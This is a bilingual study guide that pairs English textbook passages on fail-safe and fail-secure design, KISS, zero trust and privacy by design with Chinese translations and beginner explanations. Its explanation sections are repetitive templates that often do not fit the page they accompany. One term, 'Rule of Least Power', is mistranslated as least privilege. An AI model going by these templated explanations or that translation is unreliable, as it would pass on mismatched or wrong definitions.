The designer/developer must decide what type of complete failure to perform and what to protect or sacrifice to achieve the planned failure result. There are numerous scenarios to consider. The initial distinction is whether the product is something that affects the physical world, such as a door-locking mechanism, or primarily a digital asset–focused product, such as a firewall. If a product can affect the physical world, then the life and safety of humans must be considered and likely prioritized. This human protection prioritization is called fail-safe.

The idea is that when a failure occurs, the system, device, or product will revert to a state that protects the health and safety of people. For example, a fail-safe door will open easily in an emergency to allow people to escape a building. However, this implies that the protection of assets may be sacrificed in favor of personnel safety. However, in some physical world situations, a product could be designed and intended to protect assets in priority above people, such as a bank vault, medical lab, or even a data center. A fail-secure system prioritizes the physical security of assets over any other consideration.

For example, a vault door may automatically close and lock when the building enters a state of emergency. This prioritization of asset protection may occur at the potential cost of harming personnel who could be trapped inside. Obviously, the prioritization of physical world products should be considered carefully.

中文直译 / 整理

物理世界和数字环境。 在物理世界中,实体主要优先保护人员。 然而,在某 些情况下,资产的保护优先于人员。 在数字世界中,实体专注于保护资产, 但保护类型可能在CIA三元组中有所不同。 当一个程序能够安全地失败时,这仅是因为它被设计和编程为如此。 当将安全 失败集成到系统中时,设计者必须就失败事件的结果做出一些艰难的选择。 首 先要解决的问题是,系统是否能够以软失败模式运行。 fail-soft是指在某个组件 失效后,允许系统继续运行。 这是与导致系统完全崩溃的失败方式相对的另一 种选择。 一个典型的例子是支持多个并发应用程序的多任务操作系统:如果一 个应用程序失败,其他应用程序通常仍能继续运行。 如果失败柔化不是一个可行的选项,那么设计者需要考虑产品的类型、其部署 场景以及与故障响应相关的优先级。 换句话说,当产品在没有失败柔化设计的 情况下发生故障时,它将完全失效。 设计者/开发者必须决定执行何种类型的完 全失效,以及为了实现计划的故障结果而保护或牺牲什么。 需要考虑的场景有 很多。 最初的区分在于,该产品是否会影响物理世界,例如门锁机制,或者主 要是以数字资产为中心的产品,例如防火墙。

如果产品可能影响物理世界,则 必须考虑并可能优先保障人类的生命与安全。 这种对人类保护的优先级被称为 fail-safe。 其理念是,当发生故障时,系统、设备或产品将恢复到一种保护人员 健康与安全的状态。 例如,一个fail‑safe的门在紧急情况下会轻松打开,以便 人们逃离建筑物。 然而,这意味着资产的保护可能为了人员安全而被牺牲。 然 而,在某些物理世界情境中,产品可能被设计并旨在优先保护资产而非人员, 例如银行金库、医学实验室,甚至数据中心。 一个fail‑secure系统优先考虑资 产的物理安全,而非其他任何因素。 例如,当建筑物进入紧急状态时,金库门 可能会自动关闭并上锁。 这种对资产保护的优先级可能以潜在损害被困人员为 代价。 显然,对于物理世界产品的优先级设定应谨慎考虑。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 10 / PDF P496

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

In the context of the physical world, the term fail-open is a synonym for failsafe, and fail-closed is a synonym for fail-secure. If the product is primarily digital, then the focus of security is completely on digital assets. That means the designer must then prioritize the security aspect—namely, availability or confidentiality and integrity. If the priority is for maintaining availability, then when the product fails, the connection or communication is allowed to continue. This is known as fail-open. If the priority is for maintaining confidentiality and integrity, then when the product fails, the connection or communication is cut off.

This is known as fail-secure, fail-closed, and/or fail-safe (again, in the context of a digital environment). The Internet Engineering Task Force (IETF) recommends avoiding using the term fail-safe when discussing digital-only issues as it introduces the concept of human safety, which is not a concern in a digital context and thus causes unnecessary confusion. However, when the context switches from the physical world to the digital world, the definition of fail-safe changes. An example could be a firewall, which, if designed to fail-open, would allow communications without filtering. In contrast, implementing a fail-secure, fail-closed, or fail-safe solution would cut off communications.

The fail-open state protects availability by sacrificing confidentiality and integrity, whereas the fail-closed state sacrifices availability to preserve confidentiality and integrity. Another example of a digital environment event following a fail-secure, fail-closed, and/or fail-safe procedure is when an operating system encounters a processing or memory isolation violation, it terminates all executions then initiates a reboot. This mechanism is known as a stop error or the Blue Screen of Death (BSoD) in Windows. A condensed summary of the context and protection priority of these terms is presented in Table 8.2.

中文直译 / 整理

在物理世界的语境中,术语 fail-open 是 fail‑safe 的同义词,而 fail‑closed 是 fail‑secure 的同义词。 如果产品主要是数字的,那么安全的重点完全在于数字资产。 这意味着设计者 必须优先考虑安全性方面——即可用性或机密性和完整性。 如果优先考虑保持 可用性,那么当产品出现故障时,连接或通信仍允许继续。 这被称为故障开放 (fail‑open)。 如果优先考虑保持机密性和完整性,那么当产品出现故障时, 连接或通信将被切断。 这被称为故障安全(fail‑secure)、故障关闭( fail‑closed)和/或故障保护(fail‑safe)(同样,这是在数字环境的背景下)。 互联网工程任务组(IETF)建议在讨论仅限数字的问题时避免使用 “故障安全”一词,因为它引入了人身安全的概念,而这一概念在数字环 境中并不相关,因此会造成不必要的混淆。 然而,当上下文从物理世界切换到数字世界时,"故障安全"的定义会发生变化。 一个例子是防火墙,如果设计为故障开放,则允许未经过滤的通信。 相比之下, 实施故障安全、故障关闭或故障保护方案则会切断通信。

故障开放状态通过牺 牲机密性和完整性来保护可用性,而故障关闭状态则牺牲可用性以保护机密性 和完整性。 数字环境中遵循故障安全、故障关闭和/或故障保护机制的另一个例 子是:当操作系统检测到处理或内存隔离违规时,会终止所有执行并启动重启。 这种机制在Windows中被称为停止错误或蓝屏(BSoD)。 这些术语的上下文和保护优先级的简明摘要见表8.2。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 11 / PDF P497

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

TABLE 8.2 Fail terms' definitions related to physical and digital products Physical State Digital Protect People Fail-Open Protect Availability Protect People Fail-Safe Protect Confidentiality and Integrity Protect Assets Fail-ClosedProtect Confidentiality and Integrity Protect Assets Fail-Secure Protect Confidentiality and Integrity Keep It Simple and Small Keep it simple is a shortened form of the classic statement “keep it simple, stupid” or “keep it stupid simple.” This is sometimes called the KISS principle. In security, this concept encourages avoiding overcomplicating the environment, organization, or product design. The more complex a system, the more difficult it is to secure.

The more lines of code, the more challenging it is to test it thoroughly. The more parts there are, the more places there are for things to go wrong. The more features and capabilities, the larger the attack surface. Thus, keeping a system's design or software coding simple and small will directly relate to the difficulty of establishing, testing, and verifying its security. There are many other concepts that have a similar or related emphasis, such as the following: “Don't Repeat Yourself” (DRY) The idea is to eliminate redundancy in software by not repeating the same code in multiple places. Otherwise, duplicating code would increase the difficulty if changes are needed.

Computing Minimalism Crafting code to use the least necessary hardware and software resources possible is computing minimalism. This is also the goal of the program evaluation and review technique (PERT), which is discussed in Chapter 20. Rule of Least Power Use the least powerful programming language that is suitable for the needed solution. “Worse Is Better” (aka New Jersey Style) The quality of software does not necessarily increase with increased capabilities and functions; there is often a worse software state (i.e., fewer functions), which is the better (i.e., preferred, maybe more secure) option.

中文直译 / 整理

表 8.2 与物理和数字产品相关的失败条款定义 物理 状态 数字 保护人员‑失效开放 保护可用性 保护人员,失效安全 保护机密性和完整性 保护资产,失效封闭 保护机密性和完整性 保护资产,失效安全 保护机密性和完整性 保持简单与小巧 保持简洁是经典陈述“保持简洁,愚蠢”或“保持愚蠢地简洁”的简写形式。 这有时被称为KISS原则。 在安全领域,这一概念鼓励避免使环境、组织或产品 设计过于复杂。 系统越复杂,就越难以保障其安全性。 代码行数越多,彻底测 试的难度就越大。 组件越多,出错的地方就越多。 功能和能力越多,攻击面就 越大。 因此,保持系统设计或软件编码的简单和精简,将直接关系到建立、测 试和验证其安全性的难易程度。 还有许多其他概念具有相似或相关的重点,例如以下内容: “不要重复自己”(DRY) 这一理念是通过不在多个地方重复相同代 码来消除软件中的冗余。 否则,代码重复会使更改变得困难。 计算极简主义 以最少的硬件和软件资源编写代码是计算极简主义。 这也 是计划评估与审查技术(PERT)的目标,该技术将在第20章中讨论。 最小权限原则 使用最适合所需解决方案的最弱编程语言。

“更差即更好”(又称新泽西风格)软件的质量并不一定随着功能和能力 的增加而提高; 通常存在一种更差的软件状态(即功能更少),但这反而 是更好的(即更受青睐,可能更安全)选择。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 12 / PDF P498

第 498 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

“You Aren't Gonna Need It” (YAGNI) Programmers should not write capabilities and functions until they are necessary, so rather than create them when you think of them, create them only when you need them. It is easy to get caught up in adding complexity to a system, whether that system is a software program or an organizational IT security structure. The KISS principle encourages us all to avoid the overly complex in favor of the streamlined, optimized, and reduced solution. Simpler solutions are easier to secure, easier to troubleshoot, and easier to verify. Zero-Trust Zero trust is a security concept where nothing and no person inside the organization is automatically trusted.

There has long been an assumption that everything on the inside is trusted and everything on the outside is untrusted. This has led to a significant security focus on endpoint devices, the locations where users interact with company resources. An endpoint device could be a user's workstation, a tablet, a smartphone, an Internet of Things (IoT) device, an industrial control system (ICS), an edge computing sensor, or any public-facing servers in a screened subnet or extranet. The idea that a security perimeter exists between the safe inside and the harmful outside is problematic.

There have been too many occurrences of security breaches caused by insiders as well as external attacker breaches that gained the freedom to perform lateral movement internally once they breached the security barrier. The concept of a security perimeter is further complicated by the use of mobile devices, the cloud, and the proliferation of endpoint devices. If a device can operate inside a private network, then be used externally with direct internet access, and then returned to the private network, there is no actual security perimeter. For most organizations, there is no longer a clearly defined line between inside and outside.

Zero trust is an alternate approach to security where nothing and no person is automatically trusted. Instead, each request for activity or access is assumed to be from an unknown and untrusted location until otherwise verified. The concept is “never trust, always verify.” Since anyone and anything could be malicious, every transaction should be verified before it is allowed to occur. The zero-trust model is based on “assume breach,” meaning that you should always assume a security breach has occurred and that whoever or whatever “

中文直译 / 整理

你不会需要它”(YAGNI)程序员不应在必要之前编写功能和能力, 因此不要在想到时就创建它们,而应在真正需要时再创建。 在为系统添加复杂性时,无论是软件程序还是组织的IT安全结构,都很容易陷 入其中。 KISS原则鼓励我们避免过度复杂,转而采用简洁、优化和精简的解决 方案。 更简单的解决方案更容易保障安全、更容易排查故障,也更容易验证。 零信任 零信任是一种安全概念,在该概念中,组织内部的任何事物和任何人都不会被 自动信任。 长期以来,人们一直假设内部的一切都是可信的,而外部的一切都 是不可信的。 这导致了对终端设备的高度安全关注,因为终端设备是用户与公 司资源交互的地方。 终端设备可能是用户的工作站、平板电脑、智能手机、物 联网(IoT)设备、工业控制系统(ICS)、边缘计算传感器,或位于隔离子网 或外联网络中的任何面向公众的服务器。 认为在安全的内部和有害的外部之间 存在安全边界的想法是有问题的。 已有太多安全漏洞是由内部人员造成的,也 有许多外部攻击者在突破安全屏障后获得了在内部横向移动的自由。 安全边界的概念因移动设备、云服务以及终端设备的激增而变得更加复杂。

如 果一个设备可以在私有网络内部运行,然后外部直接通过互联网访问,再返回 私有网络,那么实际上就不存在安全边界。 对于大多数组织而言,内外之间的 界限已不再清晰。 零信任 是一种替代性的安全方法,其中没有任何事物或任何人会被自动信任。 相反, 在经过验证之前,每个活动或访问请求都被视为来自未知且不可信的地点。 其理念 是“永不信任,始终验证”。 由于任何人或任何事物都可能是恶意的,因此在允许 任何交易发生之前,都应对其进行验证。 零信任模型基于“假定已被入侵”的原则, 意味着您应始终假设安全漏洞已经发生,且无论谁或什么

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

安全边界:安全边界是不同信任级别或安全要求交接的位置。

程序:程序是一步一步怎么做。

零信任:零信任默认不信任任何访问请求,需要持续验证和最小权限。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 498 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Step-by-step、SOP 常对应 procedure。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
安全边界 安全边界是不同信任级别或安全要求交接的位置。
程序 程序是一步一步怎么做。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
学习单元 13 / PDF P499

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

is making a request could be malicious. The goal is to have every access request be authenticated, authorized, and encrypted prior to the access being granted to a resource or asset. The implementation of a zero-trust architecture does involve a significant shift from historical security management concepts. This shift typically requires internal microsegmentation and strong adherence to the principle of least privilege. This approach prevents lateral movement so that if there is a breach or even a malicious insider, their ability to move about the environment is severely restricted. Microsegmentation is dividing up an internal network into numerous subzones.

Each zone is separated from the others by internal segmentation firewalls (ISFWs), subnets, or virtual local area network (VLANs). Zones could be as small as a single device, such as a high-value server or even a client or endpoint device. Any and all communications between zones are filtered, may be required to authenticate, often require session encryption, and may be subjected to allow list and block list control. Zero trust is implemented using a wide range of security solutions, including internal segmentation firewalls (ISFWs), multifactor authentication (MFA), identity and access management (IAM), and next-generation endpoint security (see Chapter 11).

A zero-trust approach to security management can only be successful if a means to validate and monitor user activities continuously is implemented. If a one-time validation mechanism is used, then the opportunity to abuse the system remains since threats, users, and connection characteristics are always subject to change. Thus, zero-trust networking can only work if real-time vetting and visibility into user activities are maintained. A summary of zero trust is that all devices are segmented and isolated from each other to prevent any and all communications. Then, inter-device transactions must be authorized, authenticated, encrypted, monitored/analyzed, and logged.

中文直译 / 整理

发出请求都可能是恶意的。 目标是在授予对资源或资产的访问权限之前,对每 个访问请求进行身份验证、授权和加密。 实施零信任架构确实需要从传统的安 全管理概念发生重大转变。 这种转变通常需要内部微分段和严格遵守最小权限 原则。 这种方法可防止横向移动,从而即使发生漏洞或存在恶意内部人员,其 在环境中的移动能力也会受到严重限制。 微分段是将内部网络划分为多个子区域。 每个区域通过内部分段防火 墙(ISFW)、子网或虚拟局域网(VLAN)与其他区域隔离。 区域可以小 至单个设备,例如高价值服务器,甚至客户端或终端设备。 所有区域之间 的通信都会被过滤,可能需要进行身份验证,通常要求会话加密,并可能 受到允许列表和阻止列表的控制。 零信任通过多种安全解决方案实现,包括内部分段防火墙(ISFW)、多因素认 证(MFA)、身份与访问管理(IAM)和下一代终端安全(参见第11章)。 只 有在持续验证和监控用户活动的机制被实施的情况下,零信任的安全管理方法 才能成功。 如果仅使用一次性验证机制,则由于威胁、用户和连接特征始终在 变化,系统仍存在被滥用的机会。 因此,只有在保持对用户活动的实时审查和 可见性时,零信任网络才能发挥作用。

零信任的摘要是,所有设备都相互分段和隔离,以防止任何通信。 然后,设 备间的事务必须经过授权、认证、加密、监控/分析和记录。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 14 / PDF P500

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

In some situations, complete isolation may be needed instead of controlled and filtered interaction. This type of isolation is achieved using an air gap. An air gap is a network security measure employed to ensure that a secure system is physically isolated from other systems. Air gap implies that neither cabled nor wireless network links are available. Due to the proliferation of wireless connectivity options, a Faraday cage may be necessary to enforce air gap isolation (see Chapter 8). To implement a zero-trust system, an organization must be capable of and willing to abandon some long-held assumptions about security.

First and foremost, it must be understood that there is no such thing as a trusted source. No entity, asset, or subject—internal or external—is to be trusted by default. Instead, always assume attackers are already on the inside, on every system. From this new “no assumed trust” position, it is obvious that traditional default access controls are insufficient. Each and every subject, each and every time, needs to be authenticated, authorized, and encrypted. From there, a continuous real-time monitoring system should be established to look for violations and suspicious events.

But even with zero trust integrated into the IT architecture, it is only an element of a holistic security strategy that is integrated into the entire organization's management processes. Zero trust has been formalized in NIST SP 800-207, “Zero Trust Architecture.” Please consult this document to learn more about this revolution in security design. Trust but Verify The phrase “trust but verify” (a quote from a Russian proverb) was made famous by former president Ronald Reagan when discussing U.S. relations with the Soviet Union. However, our focus on this phrase is on its use in the security realm.

A more traditional security approach of trusting subjects and devices within the company's security perimeter (i.e., internal entities) automatically can be called “trust but verify.” This type of security approach leaves an organization vulnerable to insider attacks and grants intruders the ability to easily perform lateral movement among internal systems. Often, the trust but verify approach depends on an initial authentication process to gain

中文直译 / 整理

在某些情况下,可能需要完全隔离而非受控和过滤的交互。 这种隔离通 过气隙实现。 一个气隙是一种网络安全措施,用于确保安全系统与其它系统 物理隔离。 气隙意味着既无有线也无无线网络连接可用。 由于无线连接选项 的普及,可能需要法拉第笼来强制执行气隙隔离(见第8章)。 要实施零信任系统,组织必须具备并愿意放弃一些长期持有的安全假设。 首先, 必须理解并不存在可信赖的来源。 任何实体、资产或主体——无论是内部还是 外部——默认都不应被信任。 相反,应始终假定攻击者已经潜入每个系统内部。 从这种新的“不假设信任”立场出发,显然传统的默认访问控制是不够的。 每 次每个主体都必须经过身份验证、授权和加密。 在此基础上,应建立一个持续 的实时监控系统,以发现违规行为和可疑事件。 但即使将零信任集成到IT架构 中,它也只是整体安全策略的一个组成部分,该策略必须融入整个组织的管理 流程中。 零信任已在NIST SP 800‑207《零信任架构》中正式化。 请查阅该文 档以深入了解这一安全设计的革命。 信任但要核实 短语“信任但验证”(源自一句俄罗斯谚语)在前总统罗纳德·里根讨论美国与 苏联关系时广为人知。

然而,我们关注此短语的重点在于其在安全领域的应用。 一种更传统的安全方法是自动信任公司安全边界内的主体和设备(即内部实体), 这可称为“信任但验证”。 这种类型的安全方法使组织容易受到内部攻击,并 使入侵者能够轻松在内部系统之间进行横向移动。 通常,信任但验证的方法依 赖于初始身份验证过程以获取

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

ISO 偏标准和管理体系。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 15 / PDF P501

第 501 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

access to the internal “secured” environment and then relies on generic access control methods. Due to the rapid growth and changes in the modern threatscape, the trust but verify model of security is no longer sufficient. Most security experts now recommend designing organizational security around the zero-trust model. So, in regard to the question of “zero trust or trust but verify?”, today's answer should only be zero trust. Privacy by Design Privacy by design (PbD) is a guideline to integrate privacy protections into products during the early design phase rather than attempting to tack it on at the end of development.

It is effectively the same overall concept as “security by design” or “integrated security,” where security is to be an element of the design and architecture of a product starting at initiation and being maintained throughout the software development life cycle (SDLC).

As described in Ann Cavoukian's paper “Privacy by Design – The 7 Foundational Principles: Implementation and Mapping of Fair Information Practices,” the PbD framework is based on seven foundational principles: Proactive, not reactive; preventive, not remedial Privacy as the default Privacy embedded into design Full functionality – positive-sum, not zero-sum End-to-end life cycle protection Visibility and transparency Respect for user privacy The goal of PbD is to have developers integrate privacy protections into their solutions to avoid privacy violations in the first place. The overall concept focuses on prevention rather than remedies for violations.

PbD is also the driving factor behind an initiative to have privacy protections integrated throughout an organization, not just by developers. Business operations and systems design can also integrate privacy protections into their core functions. This in turn, has led to the Global Privacy Standard (GPS), which was crafted to create a single set of universal and harmonized privacy principles. GPS is to be adopted by countries to use as a guide in developing privacy legislation, used by organizations to integrate privacy

中文直译 / 整理

对内部“安全”环境的访问,然后依赖通用的访问控制方法。 由于现代威胁 环境的快速增长和变化,信任但验证的安全模型已不再足够。 大多数安全专 家现在建议围绕零信任模型设计组织安全。 因此,针对“零信任还是信任但 验证? ”这一问题,今天的答案只能是零信任。 隐私设计 隐私设计(PbD)是一种指导原则,旨在在产品设计的早期阶段集成隐私保护 措施,而不是在开发结束时才试图附加。 它与“安全设计”或“集成安全”整 体概念相同,即安全应从项目启动之初就成为产品设计和架构的一个组成部分, 并在整个软件开发生命周期(SDLC)中持续维护。 如安·卡沃基安所描述的 paper “Privac y by Design – The7项基本原理:公平信息实践的实施与映射”,PbD框架基于以下七项基 本原理: 主动而非被动; 预防而非补救 默认保护隐私 隐私嵌入设计 完整功能——正和而非零和 端到端生命周期保护 可见性与透明度 尊重用户隐私 PbD 的目标是让开发人员将隐私保护措施融入其解决方案中,以从一开始就 避免隐私泄露。 整体概念侧重于预防,而非事后补救。

PbD也是推动一项倡议的主导因素,该倡议旨在将隐私保护融入整个组织,而 不仅限于开发者。 业务运营和系统设计也可以将隐私保护融入其核心功能。 这 反过来促成了全球隐私标准(GPS)的制定,该标准旨在建立一套统一且协调 的隐私原则。 GPS将被各国采纳,作为制定隐私立法的指南,被组织用于将隐 私保护融入其运营,并被开发者用于将隐私保护融入其所开发的产品中。

小白解释

